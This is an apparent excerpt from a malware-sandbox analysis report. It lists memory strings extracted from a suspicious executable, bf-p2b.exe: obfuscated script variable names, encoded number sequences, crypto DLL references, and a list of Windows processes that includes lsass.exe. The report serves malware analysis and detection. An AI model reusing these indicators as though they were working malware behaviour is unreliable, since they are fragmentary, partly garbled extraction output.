                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y6lj8bn6eu6xmemstr_7ea1e3e1-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5kkeysmemstr_2109cbc6-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\wshbth.dlllmemstr_f7813246-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587800w246587807w246587781ememstr_8631c159-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function: g1ps9et3mn7d()j1hkmemstr_42d8d93b-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y9ra5bz1hh5smemstr_389d9cfd-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1bp2hs6jj1hmemstr_120cd3ad-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y9ra5bz1hh5s=memstr_27e39b70-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587800w246587807w246587781*memstr_ef46060d-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y5pq5nm6ai8r#memstr_f99742d2-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587800w246587807w246587781memstr_3273d201-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $t2xx3oj8sr5n1iy4fv4rz7t = memstr_0f4c4ed8-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $v1dg5qi2jv1a0iq1zs6h = memstr_484a64ed-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2uw9ec8l5smemstr_25c8816a-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1bp2hs6jj1hsmemstr_57752cb6-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1bp2hs6jj1h5shmemstr_171b35b3-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bcryptgetproperty $m2ls1ck8jy4a~memstr_74fe89b0-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bcryptsetproperty $m2ls1ck8jy4awmemstr_2ba5c6f6-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bcryptgetproperty $m2ls1ck8jy4almemstr_f6eebbe7-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k2bl0lg2bmemstr_6b17b431-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1et0ty4rz7xkmemstr_77a2033d-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k3yl9mg0nmemstr_811d3916-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h4sm7yy8jh0ckmemstr_747e966f-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2uw9ec8lkmemstr_ab97154a-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y0cm5hb1nkmemstr_d16d47c6-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ps`t8memstr_331bc104-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bt8st5y5ih0go3h5eo8mv3tt7jmemstr_0c206803-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k3gl1cq8dkmemstr_bf4812c6-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k1js5sb2wc5mmemstr_00fa2147-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h1xs2ap1c1vmemstr_500230a7-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @s`t8st5y5ih0go3h5eo8mv3tt7jmemstr_fdf8d69a-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0dq2ef5dmemstr_5210acbb-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k6qe5cz1vmemstr_c209db6f-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\crypt32.dllmemstr_128f04bb-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y5yv2aw9amemstr_f87efd53-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k2yh7xc8lq4u_memstr_f72a3f44-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword cbdata;ptr pbdata;memstr_3c22f45e-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\msctf.dllmmemstr_bd458bad-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y6kf5xn4uo1ozmemstr_2207edd7-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k3ef4fk7ty1ismemstr_bbe84a7d-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h8wf2pd4eu5thmemstr_067404eb-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y5pq5nm6ai8rmemstr_fe68fb43-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k8hl0mj7kx9pmemstr_215a17ed-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k3yn2up9fkmemstr_35296f68-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming2memstr_e523bf10-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h9qq8kn3ss5dkmemstr_43ad9763-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k8pl8ne7nkmemstr_46dd8ff5-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y7eg8ni2li0gmemstr_a57a0996-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0db4wx4qkmemstr_6cc75827-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;dword;memstr_2632de66-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5go3oamemstr_eabc3ca2-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h9oa7br0amemstr_4b72b91a-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k6rf5yt3ja7qmemstr_277e5aea-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k8gg3ig9ai4nmemstr_aa9c6e13-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k9nw2kp4fi8cmemstr_fd239e09-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2cp9vn5qkmemstr_6fbe3918-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0sm8ut6if9xmemstr_d1d3183b-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k9zo4cw3mmemstr_22ecee66-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y8fu8mu6eu0jmemstr_bdb9ab69-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\cmd.exememstr_abcc3d9e-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y7za0ue6ls7d[memstr_7f4230d4-3
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;amemstr_c2e06bcc-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;float;imemstr_ad80e2d4-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h7el5fx7mb8rfmemstr_9cd8633b-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y7dj7nn6vkmemstr_e3653ebe-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2kg6hp2ztmemstr_ba08f264-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h4gn3zk4pmmemstr_9ab7cb2a-6
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0lv4qb3qkmemstr_bb764f90-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;memstr_b066a178-1
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;float;float;float;int;kmemstr_ff11f869-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8pc4lh0o8ej0xo5th5k0jy3ny2mkmemstr_794bbe7c-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y5fb7pn8sy6t>memstr_6e7c727a-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6fw8st5y5ih0go3h0wf1xa4k`<memstr_49c87cd0-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9do4sd7on7r0ed7oi2y2fa4ey3ykmemstr_0496fa21-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ole2ae94be238c88f4459cc1555a5f9memstr_923b5c25-a
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uu?e!memstr_058de2a7-f
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dbu$memstr_386c7bbf-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dpe@2dtmemstr_975946d7-b
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\dnsapi.dllmemstr_205d1c95-c
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\bcrypt.dllmemstr_5b3d4ecb-8
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\mswsock.dllumemstr_3707cf9f-e
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [6x^~memstr_13b17203-9
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ole96e6340821868812800f81c0e609!memstr_e2082f7b-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dbulmemstr_c7bcc4f3-2
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l/bupmemstr_1c3cd2a4-d
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 800w246587797w246587796w246587779memstr_a32aa82a-4
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 246587827w246587826w246587779w246587784w246587777w246587781w246587838w246587777w246587796w246587807w246587824w246587805w246587798w246587806w246587779w246587800w246587781w246587801w246587804w246587809w246587779w246587806w246587783w246587800w246587797w246587796w246587779memstr_d18943bf-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erroromemstr_335338dc-5
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '(`n~memstr_5f3469af-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >@@m~memstr_61f36f2e-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: error0p~memstr_cf2796c2-0
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfo~memstr_6a36a2b0-7
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfxmemstr_2e42c3fc-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0 memstr_0e313f96-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x*`dkmemstr_ebeb94e3-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: systemmemstr_4dce5609-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: registry(memstr_777f4187-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: smss.exehmemstr_321568d3-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exe(memstr_7ebe1a4f-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wininit.exememstr_368b0948-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #r0lmmemstr_171b56e7-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csrss.exememstr_2c4ee1f2-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: winlogon.exememstr_4ce37aa9-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: z3zbymemstr_a311dcd9-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: services.exememstr_51ba4e07-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: n`q`q`qz,memstr_7419f775-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 73h[mmemstr_397b4899-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lsass.exememstr_d6d70bf1-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exememstr_5a18077e-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fontdrvhost.exememstr_614a84aa-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe(memstr_fb1b4822-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,p#p&p#fmemstr_27f55bfc-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exe memstr_abbbb038-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dwm.exememstr_356e406d-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: p, )pmemstr_e0027f89-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: svchost.exehmemstr_ad43e079-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: s4nrsmemstr_55a179b6-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @[`p xmemstr_6bd14c6c-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hh!svchost.exe(memstr_d58d7f65-9
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: x"svchost.exe8memstr_6e2856b4-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #memory compressionhmemstr_c4915553-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $svchost.exememstr_7d5aa962-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %svchost.exehmemstr_73294557-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &svchost.exememstr_c784906e-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'svchost.exehmemstr_78694576-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )svchost.exememstr_538c98ce-8
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *svchost.exe(memstr_eddde137-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +svchost.exehmemstr_353ef393-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,svchost.exememstr_71143001-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .svchost.exememstr_b472471b-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `4x+`memstr_6f68cf50-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /svchost.exememstr_4a9ca715-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <(p6(memstr_fc4262f4-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0svchost.exememstr_88699a14-2
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1svchost.exememstr_acac839c-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2spoolsv.exe(memstr_69f5ef59-3
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3svchost.exememstr_46525a36-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4svchost.exe(memstr_19bbb1e3-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5svchost.exe(memstr_9d4742a8-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6svchost.exememstr_20388182-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "txmemstr_30c80273-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7svchost.exememstr_a749e92b-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "\`memstr_689e1f6e-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &\tmemstr_f5e3a1fc-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 8svchost.exe(memstr_0b2ad122-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: d~xzbmemstr_5443d8bb-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: :svchost.exememstr_cd38e359-f
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <svchost.exememstr_f2f20578-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %pcnzmemstr_41c313a7-5
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #=officeclicktorun.exe(memstr_f53ee73a-a
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: >svchost.exehmemstr_ee9ea5b0-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ?svchost.exehmemstr_284f471a-4
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @svchost.exe(memstr_780c995d-0
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: asvchost.exememstr_84d0c5e3-c
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: csvchost.exememstr_360c7459-d
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dsvchost.exe(memstr_051c979b-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: esvchost.exememstr_c7cc92b8-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fsvchost.exememstr_43362cbd-b
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k0\0]0\.memstr_36158def-6
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )gsihost.exe(memstr_fbbc4941-e
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hsvchost.exememstr_b46bf800-7
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: y0p t0pxmemstr_dc3416e7-1
                Source: bf-p2b.exe, 00000000.00000003.1700527733.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: isvchost.exememstr_a8d01642-b
